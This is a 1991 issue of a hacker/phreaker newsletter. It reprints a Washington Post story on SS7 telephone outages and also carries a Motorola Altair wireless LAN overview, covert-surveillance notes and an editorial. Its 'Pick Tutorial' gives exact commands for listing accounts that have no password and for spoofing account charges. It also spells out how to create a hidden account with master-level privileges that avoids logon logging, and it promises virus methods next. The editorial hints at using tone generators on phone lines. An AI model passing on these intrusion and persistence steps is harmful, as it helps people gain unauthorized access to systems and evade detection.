=======================================
T H E N E W F O N E E X P R E S S
=======================================
The newsletter of the Society for the Freedom of Information (SFI)
Electronic Edition
---------------------------------------------------------------------------
The publisher, SFI, distribution site(s), and authors contributing to the NFX
are protected by the Bill of Rights in the U.S. Constitution,which specifically
protects freedom of speech and freedom of the press. The information provided
in this magazine is for informational purposes only, and the publisher, SFI,
distribution site(s) and authors are not responsible for any problems resulting
>from the use of this information. Nor is SFI responsible for consequences
resulting from authors' actions. This disclaimer is retroactive to all previous
issues of the NFX.
We accept article submissions of nearly any sort, about hack/phreak/anarchy/
gov't/nets/etc. We will also send the author a free printed issue for each
article written.
The printed edition of the newsletter is finally available for $24 (U.S.) per
year, until we find a cheaper way to reproduce it on paper. Articles may also
be submitted to this address. Send mail to the New Fone Express, Box 639,
15405 Michigan Rd., Woodbridge, VA 22191.
---------------------------------------------------------------------------
Highlights for Issue #3/August 1991
===================================
* Phones Take Lunch Break ... typed by Silicon Avalanche, edited
(see article #1)
* SUPPLEMENT: What Happened?
* A Pick Tutorial pt.2 ... by Silicon Avalanche
(see article #2)
* State of Surveillance pt.3 ... by the Cavalier
(see article #3)
* Altair Wireless LANs ... by the Cavalier
(see article #4)
* Corrections ... edited
(see article #5)
* Editorial and Bell IS News ... by the Cavalier
(see article #6)
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Phones Take Lunch Break
... Computer Failure Disables Pa. Phones...
... Outage Linked to Problem That Hit Here ...
... by Cindy Skrzycki and Evelyn Richards ...
... Washington Post Staff Writers ...
Telephone service in Pittsburgh and other parts of Pennsylvania was
paralyzed yesterday (7/1/91) by the same sort of massive computer software
failure that knocked phones out in the Washington area only four days ago
(6/29/91).
The outage in Pittsburgh interfered with service to about 1 million
customers, or about one-third of the state, beginning just after 11 a.m.
Service was restored by 5:15 p.m.
Later yesterday (7/1/91), service was disrupted for several minutes in
San Francisco, which telephone company officials attributed to the same
problem.
The failures in Pennsylvania happened just as Bell Atlantic Corp., the
parent company of both Chesapeake & Potomac Telephone Cos. and Bell of
Pennsylvania, was trying to reach some conclusion on the cause of the
disruption in Washington, which was probably the most massive collapse in
local phone service ever.
The Pennsylvania problem was the third major disruption to hit a
metropolitan area in less than a week. Last Wednesday, Los Angeles lost phone
service for much of the same time that some 6.3 million lines were out in
four states served by C&P.
Each of the problems, which have telecommunications experts scrambling
for explanations, is linked to the same type of computer switch and software
that allows phone companies to offer sophisticated services such as Caller
ID. The switch and software are manufactured by DSC Communications Corp. of
Plano Tex., (214)519-3000, the largest supplier of such equipment.
The rash of software-related disruptions confirms the predictions of many
telecommunications experts that outages will recur because of the complexity
of the new technology.
Customers in Pennsylvania, as in Washington, found when the outage hit
that they had difficulty calling across town and making toll calls to nearby
exchanges.
Dessi Plutis, who lives in Pittsburgh, ran up against the problem when
she tried to make a call across town. "The line was busy, busy, busy,"
Plutis said. "I assumed they took the phone off the hook."
What really was happening was a near replication of a major software
glitch that hit in the Washington area last Wednesday around the same time of
day. In that case, a complex computer switching system called Signaling
System 7 broke down in Baltimore and quickly affected three other computer
switches that route and set up calls for the Washington area. The computers
went into overload and shut down after reacting to a flood of maintenance
messages in the system. These messages tell computers in the telephone
network that some congestion, real or imagined, or some other problem is
being experienced.
The flood of these messages prevents other calls from going through. In
Pennsylvania, an overload of maintenance messages between two Signaling
System 7 computers also seems to be the culprit. "When it overloaded, it
backed up to the other one," said Eric Rabe, spokesman for Bell of
Pennsylvania.
What experts find most intriguing is the fact that all of the problems
seem to be traceable to the software supplied by DSC. The company recently
completed shipment on its hundredth Signaling System 7 switch and counts
among its major customers the regional telephone companies and long-distance
carriers such as MCI Communications Corp. and US Sprint Communications Co.
A spokesman for DSC said Signaling System 7 is "the leading product in
the industry. It has run flawlessly for a number of years. We still don't
know that it isn't."
The spokesman said the computer did what it was supposed to do - shut
down when it's overloaded. He said approximately 200 people are working
"around the clock" to prevent a recurrence of the outages, and phone
companies have been sensitized for what conditions to watch for, as well as
how to isolate, stabilize and restore service.
"We know the symptoms. We don't know the cause," the DSC spokesman said.
The outages on the Eastern seaboard present a major image and reliability
problem for Bell Atlantic. All told, the company has had major problems in
five of the seven states it serves in the last week. "Obviously, [the
breakdown] doesn't help us, but... I hope we've built up a lot of years of
understanding that quality is the name of the game," said Anton J.
Campanella, president of Bell Atlantic. "We are not going to rest until we
find the answer to this one." Bell Atlantic said it is working closely with
DSC and that the switch manufacturer has provided software "patches" to
prevent the problem from recurring by shutting down maintenance messages.
But the company clearly is worried that some element of Signaling System 7
may somehow be inherently flawed. "My tummy gets upset when a manufacturer
delivers a product that doesn't work correctly," said Campanella, though he
stressed that the problem hasn't been identified. He also said that a virus
is not being ruled out since all of the occurrences in the Bell Atlantic
network seemed to start around the same time of day. The company has been in
contact with the FBI to follow up on that possibility.
Pacific Bell, whose problems began on June 10, also has been in close
touch with DSC. "We were entirely unhappy with what happened June 10," said
Sue Galloway, regional switching manager for Pacific Bell's Southern
California network operations. "Even though analysis was going on, we were
concerned and we wanted to send a very clear message." The company was so
concerned that Pacific Bell called in DSC's chairman to meet with top
telephone officials in northern California, a Pacific Bell official said. In
San Francisco, a computer began spitting out congestion messages about 11
a.m. Pacific time. Traffic was rerouted and service was restored. The outage
in Pennsylvania also caused officials at C&P to rethink an announcement
yesterday about how customers in the Washington region might be compensated
for their troubles last Wednesday. "It may be premature to make any kind of
announcement," said Michael Daley, spokesman for C&P in the District. "We'll
talk about what we can do for customers when we get over the hurdles of these
phone outages."
... Staff writer John Burgess contributed to this report ...
... Courtesy of Silicon Avalanche of SFI ...
... from The Washington Post, July 2, 1991, pgs. D1 and D4. ... ><
------------------------------------------------------------------------------
------------------------------------------------------------------------------
What Happened?
As far as we could guess, the common denominator in all these cases was
a switch that was processing a large number of calls. Due to SS7's
capability to pass network traffic off to other switches, it tried to do so,
but ended up passing an overload message instead. The second switch then
decided that it wanted to be overloaded, and it cascaded through the local
network of CCS7-connected switches, thereby locking up the entire SS7-capable
network. DSC Communications eventually turned out to be the culprit -
another bug in the SS7 software, which was written by the DSC people. We've
been told that this is not exactly what happened with the AT&T network crash
on Jan. 15, 1990, however: apparently AT&T writes their own STP (signaling
transfer point, a module that allows switches to run SS7) software. We would
venture a guess that DSC is a vendor of STPs - and a popular one at that. ><
------------------------------------------------------------------------------
------------------------------------------------------------------------------
A Pick Tutorial
A Pick Tutorial - Courtesy of Silicon Avalanche of SFI
Installment #2
TICKLE, TICKLE...
Well, by now you should have some means of getting in and out of some
account on a Pick system, whether it be the TUTOR account, or some other
system account. The best place to be is at what is called TCL (pronounced
"tickle"), short for 'T'erminal 'C'ommand 'L'evel. This is the main command
level, Pick's version of Direct Mode. If you're not there, and you're at a
menu or some other place, try "Q", "X", "", and other such options, to
see which of them may work. Try sending a character, or -"C",
this should take you to either the Pick/Basic Debugger or the System
Debugger. If this is the case, you should be taken to a prompt similar to:
I502 or 274.263
* !
at the prompt, enter
END
and hopefully you'll be at TCL. Worst case, you'll be back at the menu you
just left. If this is the case, find the way to logoff, and find a new
account to use. You've hit a dead end on this one.
WHAT CAN I DO NOW?
Command / Function & Output
-----------------------------------------------------------------------------
LISTFILES / Lists the files available from the account you're in
WHO / Tells you what account and port # you're logged onto
LISTU / Lists the other users on the system and the accounts
/ they're logged onto
TIME / Gives the system time
DATE / Gives the system date
LIST GAMES / On many systems, lists a file of games to play
LOGON / Log another port onto a specified account
LOGOFF / Log another port off
LOGTO acct / Change accounts from the current one to 'acct'
-----------------------------------------------------------------------------
More Interesting Commands:
LIST ONLY SYSTEM
Lists all valid accounts on the system
LIST ONLY SYSTEM WITH *A7 = ""
Lists all valid accounts on the system that have NO PASSWORD
CHARGE-TO acctname
Makes the system record think you are logged onto another account
(acctname). Confusing to explain, but a good thing to do if you're
hacking..
-----------------------------------------------------------------------------
** The PICK Glossary has been dropped from this installment of A Pick
Tutorial in the name of brevity. It will be printed in a later installment.
**
-----------------------------------------------------------------------------
HOW DO I MAKE MY OWN ACCOUNT?
By using the following process, you will create a system-level account that
has the same privileges as SYSPROG, the master account on the system.
>From the TCL prompt, type
ED SYSTEM acctname
where acctname is the name of the account that you want to create to use for
access at a later date. The system will respond with something like:
NEW ITEM
TOP
.
and the cursor will be positioned to the right of the '.'. Now type
I
and the computer will respond with
001+
and will await entry of the lines of information. Type the following EXACTLY
AS IT IS WRITTEN!
Q
SYSPROG
.
.
.
.
.
SYS2
L
10
F
RU99/.//
FI
Now you will be back at the TCL prompt. Your account is now created. Type
LOGTO acctname
where acctname is the name of the account you just made, and you will be in
your new account. If you want to put a password on your new account, type
PASSWORD
and you'll be prompted for the account name and password you wish to use.
Enter this information, and when prompted for the next account name, hit
and you'll return to the TCL prompt. Passwords can be any length,
comprised of virtually any characters, including control codes, as stated in
installment #1 of the Pick Tutorial.
WHAT NOW?
Play around in your new account, see what things do, take as much time as you
like. The system does not record logon/logoff or on-line times for this
account, because it was not created to track such things. Since this is the
case, the only way that your account will be noticed is if someone looks at
the SYSTEM file to see all the accounts on the system.
WHAT'S NEXT?
The next installment of The Pick Tutorial will contain information on a
simple Pick Virus, and other methods of wreaking havoc on the system. (For
the benevolent ones of you, this will still be useful information.)
><
------------------------------------------------------------------------------
------------------------------------------------------------------------------
State of Surveillance pt.3
This third installment covers video bugs. First off, we'll start with
the video camera. Since walking around pointing shoulder-held video cameras
at people tends to be somewhat obvious, companies have made cameras that are
the size of matchboxes, being somewhere around an inch and a half square.
This is, of course, without power supply or tape. A neat trick for observing
people in rooms is to run a fiber optic cable through a lens or two to the
camera, and to run the other end through a pinhole in the wall. In this way,
the light from the room will enter the fiber optic cable and be recorded on
the other end by a camera, conveniently out of sight on the other side of the
wall. I've also been told about a fake car antenna that has a similar
pinhole and fiber optic assembly leading down to a camera and transmitter
under the antenna. The antenna rotates and sends a video image to a
briefcase with a receiver and a TV screen. It's supposedly used for
stakeouts. Through fiber optics, one can mount the actual camera almost
anywhere.
Another type of 'video bug,' in a way, is night-vision. There are t
wo
major commercial approaches to night vision: infrared and image
amplification. Infrared vision can be accomplished in one of two ways:
active or passive. Active infrared vision consists of an infrared flashlight
and a camera or goggles that are sensitive to infrared light. The subjects
never know they're being watched, unless they have an infrared-sensitive
device. The best way to detect if you are being watched by an active
infrared camera is to buy an infrared detector card used for testing remote
controls, such as Radio Shack sells for $6.95. Assuming this will be done in
the dark, the card should fluoresce when hit by strong infrared light.
Passive infrared vision is a little bit more tricky. This type of
vision doesn't depend on an infrared light source; therefore, it is a lot
harder to detect. This system detects the differences in the amount of heat
given off by objects and translates it into a video image. As a side
benefit, these systems can be so sensitive that they can detect a handprint
up to five minutes after the subject has left, simply because of the heat
difference. Passive infrared can't be detected by the above-mentioned card.
Image amplification is a technique used for amplifying the amount of
visible light incident on the goggles and turning it into a video image.
Along with passive infrared vision, image amplification is another technique
the United States military uses. As a matter of fact, image amplification
was used extensively in the so-called 'Desert Storm conflict,' by forward
scouts who needed to see in the dark.
Another meaning of 'video bug' can be applied to TEMPEST equipment, or
what is sometimes called Van Eck phreaking. Video screens, computers,
'intelligent' keyboards (like those found on IBM/IBM compatibles) all send
out immense amounts of what most people regard as RF interference. However,
with the proper equipment, these signals can be picked up and read from as
far as one kilometer away. The defense against this, of course, is to shield
your computer from this type of emission. A few years ago, GRiD Inc. (now
part of Tandy) sold some TEMPEST-shielded computer equipment to the
Government, so you may wish to contact them.
The next installment will cover miscellaneous other counter-surveillance
and personal-protection type items, and will supposedly be the last. ><
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Altair Wireless LANs
The Altair wireless LAN system (or the Altair Wireless In-Building
Network, or WIN for short, as Motorola likes to say) is probably the most
technologically-advanced wireless LAN system on the market. The major
difference between the Altair network and other competing wireless products
is that the Altair uses the 18-GHz DTS band to transmit, allowing speeds as
fast as 15 MBps. Since Ethernet's top speed is 10 MBps, the Altair WIN
should easily be able to handle the amount of communication. Also, since the
DTS band is quite uncrowded, the LAN doesn't have to deal with as much
interference as wireless LANs that operate in the UHF band. Since that band
is also allocated to cellular phones, television, FM radio, and 'high-
performance' walkie-talkies, they also need to use spread-spectrum
transmission. Simply put, this type of transmission will limit the bandwidth
to 1.5 - 2 MBps, far too slow for true Ethernet. Infrared LANs only work
when the computers in general share a 'common ceiling,' quite literally.
Most infrared LANS consist of modules aimed at the ceiling. In this way,
the light should bounce of the ceiling and down to another computer. This
technology has serious problems when the surface in question is textured or
non-flat in any way.
A typical Altair LAN consists of one Control Module, or CM, and one or
more User Modules, or UMs, per microcell. One CM can have up to 32 Ethernet
devices in a microcell, and each UM can be hooked up to a maximum of six
Ethernet devices (i.e. workstations, printers, etc.). Data security is
exceptional, for three reasons. The first is the frequency at which the data
is transmitted. The 18 GHz frequency area is extremely hard to pick up
without large, high-priced, ultra-sensitive microwave detection equipment
(incidentally, similar to that used to pick up monitor and computer emissions
- see "State of Surveillance pt.3," elsewhere in the issue). Signals in this
range of the spectrum act like light in that they partially reflect off
surfaces, and like radio in that they penetrate non-structural walls (i.e.
drywall, and walls that aren't thick concrete, etc.) Because the signal
reflects, multipath distortion (similar to that experienced with 'ghosting'
on a TV set) would effectively scramble the signals beyond recognition. Not
to mention, since the maximum output power is 25 mW, this equipment would
have to be positioned very close to the microcell itself. For this reason,
one can have another Altair microcell operating independently as close as 200
feet away.
A second reason is that the network automatically scrambles data sent
between the CMs and UMs. Each UM has a specific scrambling code, similar to
an address. This 16-bit code can have one of 65,535 possible values, and is
in addition to the slot-assigned 10-bit 1024-combination code, which is
changed every time data is sent between modules.
The third reason is that the network supervisor can enter a list of 12-
digit UM Ethernet addresses from all of the UMs that are supposed to be in
the network. The CM will then ignore any UM whose registration number is not
on the list. The UM can then neither transmit or receive data, since both
operations must be verified by the CM by a slot assignment before they take
place.
The protocol used is a variant on the 'slotted Aloha' protocol: for
every transaction, the UM requests a transmission slot from the CM. When the
CM has verified that the UM should exist on the network, the CM executes the
request, scrambling per both the 10-bit conversation code and the 16-bit UM
ID code. The actual transmission protocol is built into a VLSI ASIC chip,
which uses four-level frequency-shift keying (similar to that of 2400 and
9600 baud modems, which split the signal across four 600 or 2400 bps
segments) and handles miscellaneous network functions. Since the network is
packet-switched, it also handles CRC checksums and CSMA functions, providing
a bit error rate of 10 to the negative eighth power (according to Motorola).
The ICs that actually transmit and receive the information are five GaAs
(gallium arsenide) chips, hooked up to a six-sector antenna. At the
beginning of each transmission, the system sweeps through each combination of
antennae for transmission and reception, 36 in all. Each antenna occupies a
60-degree arc, so when an obstacle is placed in the path of a transmission
the system automatically reconfigures the antenna network for a better path.
The system's operating frequencies are the 18.820-18.870 GHz band and the
19.160-19.210 GHz band, both licensed from the FCC under the DTS (Digital
Termination Service) designation and well into the microwave range.
The Altair WIN will most probably be the wireless LAN technology of the
'90s. Using the Altair system, a business can have a microcell on each
floor, with the CMs connected through an Ethernet backbone. The security of
the LAN is so bulletproof that it would be a lot easier to try to hack into
the LAN itself, and businesses will appreciate this. For more information,
contact Motorola's Altair division. ><
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Corrections
Silicon Avalanche's handle IS Silicon Avalanche, not "Silicon Lightning"
as misprinted in NFX #2. ><
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Editorial
Right before we went to press, it was just announced that the Baby Bell
RBOCs have just been allowed to enter the information services business,
under pressure from the Dept. of Justice and the FCC. Judge Greene (the
judge presiding over the breakup of AT&T in 1982) made the ruling apparently
against his will, but he did leave a block of time to allow appeals.
Well here we are at the end of the third issue... By the way,
sorry about putting the above piece of news in the editorial, but I
couldn't find anywhere else to... There is now a way to subscribe to the New
Fone Express, or to send articles, if you want - see the header. Also, to
download the NFX, there is now an account on Secret Society (see the header
on this one, too).. And by the way, no, I'm not the sysop -- the sysop is
Grim, and he's been a great help in getting the NFX out. [Thanks!]
This one is a little smaller than #2.. we didn't get in that many
articles this time around, but that's probably because it's July... I barely
even had time to do much either, but I think this one is still better than
the first. I'm saving up a lot of the information for a big
Trendwatch column for NFX #4.. I didn't have too much this time around, so I
figured it would be better to put it all in a combined one.
During a trip to Canada, it was somewhat amusing to visit the Bell
Canada building in Toronto -- they were so proud of their Northern Telecom
SL-1 switch, they had in on display behind plexiglas in the lobby!.. A little
farther out, we ran into more party lines than we knew what to do with, and
we promptly kicked ourselves for not bringing some sort of.. tone-generating
device, that's it!... Oh well..
BTW, Dr. Logic -- I haven't forgotten you, I'll get back to you ASAP if
I haven't already by the time you see this..
And I think that will just about wrap this issue up. Until next
time. ><